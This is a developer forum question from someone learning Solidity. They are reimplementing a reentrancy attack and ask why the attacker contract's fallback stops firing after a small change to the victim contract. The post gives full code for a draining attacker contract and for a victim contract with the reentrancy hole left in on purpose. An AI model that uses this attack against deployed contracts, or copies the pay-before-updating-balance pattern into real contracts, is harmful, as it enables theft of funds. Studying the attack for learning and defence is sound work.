# Fallback function not evoked after the return type changed from void to bool in solidity

Tags: solidity, smartcontracts

I am pretty new in solidity. 
I am trying to reimplement the reentrance attack.

I got this working by the smart contract below.

```
// import "./HoneyPot.sol";
contract HoneyPotCollect {

  HoneyPot public honeypot;
  event logString(string);
  event logfallback(uint, uint);
  address honeypot_addr;
  constructor (address _honeypot) public {
    honeypot = HoneyPot(_honeypot);
    honeypot_addr = _honeypot; 
  }
  function kill () public{
    selfdestruct(msg.sender);
  }
  function collect() public payable {
    honeypot.put.value(msg.value)();
    bool res = honeypot.get();
  }
  function () external payable {
     uint balance = honeypot.balances(msg.sender);

     emit logfallback(honeypot_addr.balance, msg.value);
    if (honeypot_addr.balance > msg.value) {
        emit logString("callback");
        bool res = honeypot.get();
    }
  }
}



contract HoneyPot {
  mapping (address => uint) public balances;
  constructor() public payable {
    put();
  }
  function put() public payable {
    balances[msg.sender] = msg.value;
  }
  function get() public payable {
      (bool succ, ) = msg.sender.call.value(balances[msg.sender])("");
      require(succ);
      balances[msg.sender] = 0;
  }

}
```

However. after I changed the second part of the codes, which is the contract HoneyPot. I cannot evoke the fallback function of the HoneyPotCollect when I called the function collect() in the HoneyPotCollect.

The change is just to make the get() function in HoneyPot to return bool type.

```
contract HoneyPot {
  mapping (address => uint) public balances;
  constructor() public payable {
    put();
  }
  function put() public payable {
    balances[msg.sender] = msg.value;
  }
  function get() public payable returns (bool success) {
      (bool succ, ) = msg.sender.call.value(balances[msg.sender])("");
      require(succ);
      balances[msg.sender] = 0;
      return true;
  }

}
```

Edit1: 
I just found out that the solution would be combine the two contract together in a single file. The problem is gone. 
Nevertheless, there is another problem. 
if I comment the line, the fallback function would not be evoked either.

```
require(succ)
```

the whole code is like:

```
contract HoneyPot {
  mapping (address => uint) public balances;
  constructor() public payable {
    put();
  }
  function put() public payable {
    balances[msg.sender] = msg.value;
  }
  function get() public payable returns (bool success) {
      (bool succ, ) = msg.sender.call.value(balances[msg.sender])("");
      //require(succ);
      balances[msg.sender] = 0;
      return true;
  }

}
```

Please help! Thanks in advance.